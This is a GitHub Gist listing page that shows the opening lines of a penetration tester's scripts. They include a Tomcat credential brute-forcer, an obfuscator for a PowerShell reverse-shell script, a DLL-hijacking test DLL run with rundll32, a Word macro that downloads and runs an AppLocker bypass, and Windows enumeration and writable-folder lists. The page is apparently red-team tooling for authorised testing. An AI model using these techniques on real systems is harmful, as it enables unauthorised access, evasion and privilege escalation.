Skip to content

Instantly share code, notes, and snippets.

egre55

  • London
Block or report user

Report or block egre55

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@egre55
egre55 / tomcat_brute_force.py
Last active Jan 13, 2019
tomcat_brute_force
View tomcat_brute_force.py
# author: @egre55
# script to automate the testing of common apache tomcat credentials
#!/usr/bin/env python
import sys
import requests
with open('tomcat-betterdefaultpasslist.txt') as f:
for line in f:
@egre55
egre55 / simple_case_obfuscator.sh
Created Nov 1, 2018
simple_case_obfuscator.sh
View simple_case_obfuscator.sh
# simple case obfuscator
# author: @egre55
# usage: ./simple_case_obfuscator.sh Invoke-PowerShellTcp.ps1
if [ "$1" == "" ]; then
printf "\nusage: ./simple_case_obfuscator.sh Invoke-PowerShellTcp.ps1\n\n"
exit 0
fi
file=$1
@egre55
egre55 / IIS-LogParser.ps1
Last active Nov 1, 2018
IIS-LogParser.ps1
View IIS-LogParser.ps1
# author: @egre55
[CmdletBinding()]
param(
[Parameter(Mandatory=$True)][string]$logfile
)
$host.UI.RawUI.BufferSize = new-object System.Management.Automation.Host.Size(600,20000)
while($true)
@egre55
egre55 / Get-SituationalAwareness.ps1
Last active Oct 11, 2018
Get-SituationalAwareness.ps1
View Get-SituationalAwareness.ps1
<#
Script will enumerate:
PowerShell Language Mode
Current user details
Current privileges
Domain and Forest functional levels
AD user information
AD computer information
@egre55
egre55 / find_writable_locations.bat
Created Oct 11, 2018
find_writable_locations.bat
View find_writable_locations.bat
@echo off
REM Script to find writable locations under C:\
C:
cd C:\TEMP\
echo Creating list of all directories and sub-directories
dir C:\ /s /b /o:n /a:d > C:\Temp\dirs.txt
@egre55
egre55 / procmon.ps1
Last active Oct 2, 2018
procmon.ps1
View procmon.ps1
# Simple PowerShell process monitor
while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
@egre55
egre55 / procmon.bat
Last active Oct 1, 2018
procmon.bat
View procmon.bat
REM Ugly file-based process monitor script. Non-PowerShell in case blocked
@echo off
:loop
del file1.txt 2> nul
del file2.txt 2> nul
for /f "usebackq skip=1 tokens=* delims= " %%i in (`wmic path win32_process get commandline ^| findstr /r /v "[^\ ]"`) do echo %%i >> file1.txt
@egre55
egre55 / calc.c
Created Jul 31, 2018
calc.c (calc.dll) by Holly Graceful @HollyGraceful
View calc.c
/*
cl.exe /LD calc.c
rundll32 shell32.dll,Control_RunDLL C:\Users\%username%\Desktop\calc.dll
calc.c by @HollyGraceful
https://www.gracefulsecurity.com/privesc-dll-hijacking/
*/
#include <windows.h>
int fireLazor()
{
@egre55
egre55 / macro_download_and_execute_rundll32_powershdll_powershell.vba
Last active May 28, 2019
macro - download and execute applocker bypass (rundll32 / powershdll / powershell)
View macro_download_and_execute_rundll32_powershdll_powershell.vba
' based on
' https://stackoverflow.com/questions/17877389/how-do-i-download-a-file-using-vba-without-internet-explorer
'
' PowerShdll.dll by @p3nt4
' https://github.com/p3nt4/PowerShdll
'
' rundll32 is a good candidate as blocking this abuse binary impacts certain Windows functionality - RDP/Office right-click
' shortcuts, and "run-as" a non-privileged user (perhaps a functionality edge-case)
Sub Document_Open()
@egre55
egre55 / locations_writable_by_non-admin_users_in_windows.txt
Last active Dec 4, 2018
locations_writable_by_non-admin_users_in_windows
View locations_writable_by_non-admin_users_in_windows.txt
## locations writable by non-admin users in Windows (Windows 10)
# default folders
C:\$Recycle.Bin\<USER SID> (whoami /user)
C:\Users\All Users (links to C:\ProgramData)
C:\PerfLogs
C:\ProgramData
C:\Windows\Tasks
C:\Windows\tracing
You can’t perform that action at this time.